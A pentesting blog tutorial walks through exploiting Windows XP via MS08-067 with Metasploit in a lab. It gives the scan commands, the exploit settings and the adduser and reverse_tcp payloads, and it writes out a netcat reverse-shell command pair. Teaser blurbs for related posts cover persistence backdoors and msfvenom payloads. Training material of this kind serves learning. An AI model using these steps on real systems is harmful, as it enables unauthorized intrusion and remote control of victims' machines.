Exploiting Windows Xp using Metasploit Part-2

-

    Exploiting Windows xp using metasploit





Note : 

Before we move on I would recommend you to go through this blog which covers all the basics of metasploit , well kind of prequel to this .


Being that said we are going to particularly exploit a vulneribility called ms08_067_netapi , to know more about the vulneribility click here.

Though we know we are going to exploit windows xp machine , let's pretent that we have no idea regarding what operating system the target machine is using which gives us a close enough experience of real world pentest.

In the upcomming learnings if you have any trouble  using smb scanner or exploiting the remote machine, then you must add the file sharing option in the firewall exception rules

Hoping that you have gone through the prequel of this blog , let's move on.............. 

To know what operating systems the remote hosts

Command : 

db_nmap -A <your subnet>

Fig : 1.0




In Fig : 1.0 we have performed an aggressive nmap scan which is a mixture nmap flags -O (operating system detection) , -sV (version detection) , -sC (script scanning) and --traceroute (traceroute) .

And if we view the hosts and their services 

Fig : 1.1




Hooooo In Fig : 1.1  we could see that someone is using Windows XP in the Network !! 



But doesn't using an aggressive scan make us more prone on getting detectable ?

Yes and that is why we've got other way out to find out if there are any Windows xp machines that were present in the network and that is using smb_version module . 

Command : 

search auxiliary/scanner/smb

Fig : 1.2


In Fig : 1.2 we have entered the smb_version tool

Now see the settings and set them accordingly

Fig : 1.3




In Fig : 1.3 we have set all the options requried and good to go

Command : 

run or exploit

Fig : 1.4




In Fig : 1.4 we can see your tool found out that a host in our network is using Windows XP machine .

We can also see extra information is added into the databse as well !

Fig : 1.5



In Fig : 1.4 we can see the output of the command services where detailed information is added into the info column of the windows xp machine (192.168.216.146), this doesn't mean smb_version tool got more info that nmap aggressive detection because aggressive scan also show this information but metasploit somehow fails to parse that information and put it into the database , so aggressive scan works perfectly fine .

Note : 

But when I have searched regarding this smb_verison tool the information we got is : 

Fingerprint and display version information about SMB servers. Protocol information and host operating system (if available) will be reported. Host operating system detection requires the remote server to support version 1 of the SMB protocol. Compression and encryption capability negotiation is only present in version 3.1.1.

So this means that the target samba protocol shall qualify the above requriments inorder for us to get OS detection on the target which isn't possible all the time and this becomes unrelaiable , then it is recommended use nmap aggressive scan but also add a new flag to set Timing Templates set to 0 or 1 for firewall detection evasion which means it costs your patience and time instead .

Command :

nmap -sA <your subnet> -T0

So we found out a Windows XP machine and now get into the exploitation phase 🔥🔥 like many of you people like me are waiting for it..

Command : 

search ms08

Fig : 1.6




In Fig : 1.6 we can see that exploit we wanted to use , so let's see more about it using the info command

Command : 

info exploit/windows/smb/ms08_067_netapi

Fig : 1.7







Here In Fig : 1.7 we can see more information about the tool , its CVE details at the end and also it gives the information about different versions the exploit works against !

To use the exploit : 

use exploit/windows/smb/ms08_067_netapi

Let's see the different types of options we've got in the exploit

Command : 

show options

Fig : 1.8




Here in Fig : 1.8 we can see the RPORT option which is set to 445 , if you have a networking background and some knowledge smb you should have already know what that means , for those who have no clue regarding this . The smb is a local file sharing service that runs on port 445 and so it is set to 445 by default and we shall talk about rest of the information later .

Fig : 1.9





In Fig : 1.9 we can see we have a windows machine with port 445 open and smb service running on it

So now set the value of rhosts to that particular target

Command : 

set RHOSTS 192.168.216.146 (my windows xp ip)

and lets see the options again

Fig : 2.0




Now In Fig : 2.0  can see that Exploit target is set to automatic targeting which means the exploit is going to set the target version automatically. This exploit works pretty well with Exploit target set to Automatic targetting but sometimes the automatic targeting fails and then we have no option but the set the target manually , So just see how to set the target manually

Command :

show targets

Fig : 2.1




This command will show you the different targets available with an id parameter and as we that our version is Windows XP SP2 English  , we can set the target accordingly

To set the target 

Command :

set target 4 (which is Windows XP SP2 English (NX) in my case)

But as the automatic target works fine for this exploit I am just going to leave it just the way it is

So do you think we are all set to go ?!

Nope we aren't not still there 

We need to set the payload which does the action we wanted to be done on the target system .

Many people cofuse between exploit and a payload let me clear up it to you 

Exploit is piece of software that acts as a proof of concept where it takes the advantage of the bug or vulneribility inorder to cause unexpected behaviour on the target machine such as gaining access or gaining privilaged access on the target machine and then Payload is something as a custom code that you wanted to get executed on the target machine after exploiting it.

In Simple words

Exploits give you the ability to run your payload on the target machine and payloads are things like keyloggers , reverse shells . So payloads are only considered when code execution is possible and so there are not taken into consideration when it comes to exploits like denial of service

So now let's see the different payloads this exploit has...

Command : 

show payloads

Fig : 2.2



In Fig : 2.2 we can see all the different payloads that can be run with this exploit on the target machine with a description of it as well .

So firstly let's exploit the target machine by adding a user on it shall we :)

For this we shall set the payload windows/adduser

Command : 

set payload windows/adduser

Fig : 2.3


Fig : 2.4



In Fig : 2.4 I am not just showing off my windows xp 😉 but also I want you to observe that as of now I only have one user on the machine , only one.....

Are you a big fan of Windows Xp power on and power off sounds like me 😳 (not me feeling embarrased)

Here's the sound just for you to enjoy 😁




This sure brings back memories :)

Now is it time to exploit windows ?

I'm afraid that you should hold on a second my frienduuu... 🙃

Fig : 2.5



In Fig : 2.5 when I used show options command after setting the payload we can see the user account credentials which are going to be set when we exploit the remote windows xp machine

You can change the credentails like any other option , how to do it ? you know I know :)

And now finally you can use the exploit command ................................



Command : 

exploit

Fig : 2.6


Seems like our exploit have worked but we never know until we see Windows Xp machine so let's go

Fig : 2.7



There you goooo you see ? you see that right !!!!






Now let's try to make a reverse shell from the windows xp machine

Those who don't know what a reverse shell is , just hold your hands tight and listen to me :)

reverse shell is the best type of shell access that an attacker would strive for ..... , Iet me give you some prespective about this so that you don't confuse this with other type of shell access . Its like when you sit ideal and a girl comes and initiates the conversation :) . but then your phone rings and you wake up to reality after a long 8 hour sleep .


Well there's the roast that you never asked for 🙂

Here the girl is the target and you are the attacker machine.

So  in technical terms using netcat it would be something like : 

Command in your linux machine (ip address 1.2.3.4) :          Command on target linux machine :
 
             ncat -lvp  5555                                                                   ncat 1.2.3.4 -e /bin/bash 5555

So let's go get it now

Command : 

set payload windows/shell/reverse_tcp

Fig : 2.8



Command : 

show options

Fig : 2.9




In Fig : 2.9 we just need to set the rhosts option and we are good to go

LHOST is just the ip address of your machine and LPORT denotes the local port our PC should listen on and also denotes the port to which the target machine should connect back to

Now set the rhosts value to the ip address of Windows XP machine and then 

Command : 

exploit -j

Fig : 3.0


In Fig : 3.0 we can see that we have sucessfully triggered the vulneribility got a reverse shell back

but where is it ? I don't see it , do you see it ? I guess no ....

So there is a session opened in the background and we need to iteract with the session so that we can get the shell

To view the sessions 

Command : 

sessions

Fig : 3.1





Yes that damn thing there ! In Fig : we can see the session created with sessions-id and all we need to do is interact with the session .

To interact with the session :

Command : 

sessions -i <session-id>

Fig : 3.2





Why can't life always be this beautiful 🥹

In Fig : 3.2  can see we are in guys !  and I also want you to know the fact that we aren't no dummy user , we are the admin !! cause we can see the path we are at now which is system32 where only admin gets it when he enters into the cmd . 

So let's perform some commands and if To list files and directories : 

Command : 

To list files and directories : 

Command : 

dir

Fig : 3.3


Fig : 3.4


Fig : 3.5


So there we go guys ! we made it :) in Fig : 3.3 we can see we can execute commands and considering
Fig : 3.4 and Fig : 3.5 we can see that we can send file as well :))

So thats all for this blog and this is just Part 2 

Heads up !! there's much more cool stuff ahead , we will be learning about meterpreter , msfvenom and also make metasploit work over the internet and hope you have already tighten up you shoe laces ;)

So ya this is it for now and see you in no time :)



Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more

Generating Payloads using Msfvenom - Metasploit Part 5

-
Image
Generating and encoding Payloads using  Msfvenom Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :) So let's hop onto it shall we ! Command : msfvenom --list Fig : 1.1 In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it To list different types of modules we can use Command : msfvenom --list [modules] eg:payloads Fig : 1.2 In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads Let's create a meterpreter staged payload Command : msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -...
Read more